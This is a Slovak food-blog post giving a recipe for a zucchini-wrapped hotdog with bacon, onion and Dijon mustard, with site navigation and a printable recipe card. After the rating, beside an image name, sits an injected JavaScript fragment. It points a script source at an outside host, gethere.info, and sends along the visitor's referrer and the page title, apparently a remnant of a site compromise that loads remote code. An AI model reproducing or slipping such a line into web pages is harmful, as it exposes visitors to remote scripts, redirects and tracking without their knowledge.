FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Hlavné jedlá / Prapôvodný hotdog

Prapôvodný hotdog

19/09/2015 by Martina Leave a Comment

Tento nápad mi vŕtal v hlave odkedy som vo svojom obľúbenom farmárskom obchodíku objavila tzv. prapôvodné párky (100% mäso). Dovtedy som bola presvedčená o tom, že párky asi nikdy v živote papať nebudem. Vďaka týmto úžasným párkom som však bola nútená svoje presvedčenie prehodnotiť:).

A čo tak dopriať si zdravý hotdog? To už znie naozaj ako nonsens. Potom mi však napadla spásonosná myšlienka a rožok som nahradila vydlabanou cukinou. V kombinácií s dijónskou horčicou, cibuľkou a prípadne aj slaninkou chutí takýto hotdog rozprávkovo dobre :). Že by nápad storočia?

Tak šup-šup na hotdog :)!

IMG_0252

Ingrediencie: (na 1 hotdog)

  • 1 prapôvodný párok (ja ich kupujem U Paulíka), alebo použite iné kvalitné párky
  • 1 cukina
  • 1 menšia červená cibuľka
  • pár plátkov slaninky
  • dijónska horčica
  • čierne korenie
  • bazalka na dekoráciu

Postup:

  1. Celú cukinu umyjeme a dáme na 15 minút nad paru. Po tomto čase krásne zmäkne a môžeme ju nakrojiť a vybrať z nej nepotrebnú vnútornú dužinu.
  2. Medzitým si uvaríme párok a opečieme cibuľku so slaninkou.
  3. Cukinu naplníme cibuľou, párkom, slaninkou, horčinou, okoreníme a ozdobíme.
  4. Jednoduchšie to byť ani nemôže :). Dobrú chuť!

IMG_0257

Print
Prapôvodný hotdog

Prapôvodný hotdog

Ingredients

  • 1 prapôvodný párok (ja ich kupujem U Paulíka), alebo použite iné kvalitné párky
  • 1 cukina
  • 1 menšia červená cibuľka
  • pár plátkov slaninky
  • dijónska horčica
  • čierne korenie
  • bazalka na dekoráciu

Instructions

  1. Celú cukinu umyjeme a dáme na 15 minút nad paru. Po tomto čase krásne zmäkne a môžeme ju nakrojiť a vybrať z nej nepotrebnú vnútornú dužinu.
  2. Medzitým si uvaríme párok a opečieme cibuľku so slaninkou.
  3. Cukinu naplníme cibuľou, párkom, slaninkou, horčinou, okoreníme a ozdobíme.
  4. Jednoduchšie to byť ani nemôže :). Dobrú chuť!
5.0

IMG_0254s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share this:

  • Facebook
  • Pinterest

Related

Filed Under: Hlavné jedlá, Raňajky, Recepty, Slané pochúťky Tagged With: GF, LF, Paleo

« Figový džem
Jesenné tekvicové ragú a chrumkavé kuracie kúsky »

Leave a Reply Cancel reply

You must be logged in to post a comment.

  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Najnovšie

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Kontakt

Ochutnaj

Guest Post: Ľanový chlebík

Copyright © 2021 · Tasteful theme by Restored 316